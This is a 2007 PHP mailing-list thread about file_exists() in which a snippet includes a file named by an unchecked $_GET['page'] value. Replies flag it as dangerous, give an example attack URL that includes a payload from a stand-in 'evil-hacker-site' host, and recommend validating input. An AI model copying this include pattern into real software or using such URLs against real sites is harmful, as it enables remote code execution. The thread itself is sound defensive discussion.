I think file_exists returns false for remote files ;)
On Nov 15, 2007, at 2:33 AM, Colin Guthrie <gmane@xxxxxxxxxxxxxx> wrote:
Instruct ICC wrote:
Date: Thu, 15 Nov 2007 00:20:52 +0000
From: stuttle@xxxxxxxxx
To: philthathril@xxxxxxxxx
CC: php-general@xxxxxxxxxxxxx
Subject: Re: file_exists
Philip Thompson wrote:
I've run into similar problems where I *thought* I was looking in
the
correct location... but I wasn't. Take this for example....
$page = $_GET['page'];
if (file_exists ("$page.php")) {
include ("$page.php");
}
?>
I really hope this is not a piece of production code. If it is
then you
might want to think very hard about what it's doing. If you still
can't
see a problem let me know!
Called like this?
index.php?page=http://evil-hacker-site.com/evil-payload.php
And the browser will probably url_encode for me if needed.
Yup very dangerous.
Obviously PHP can be configured ot not include/require remote URIs,
but
as a defensive programmer you should at very least ensure your
$_GET['page'] var conformes to a validation regexp or something...
Col
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
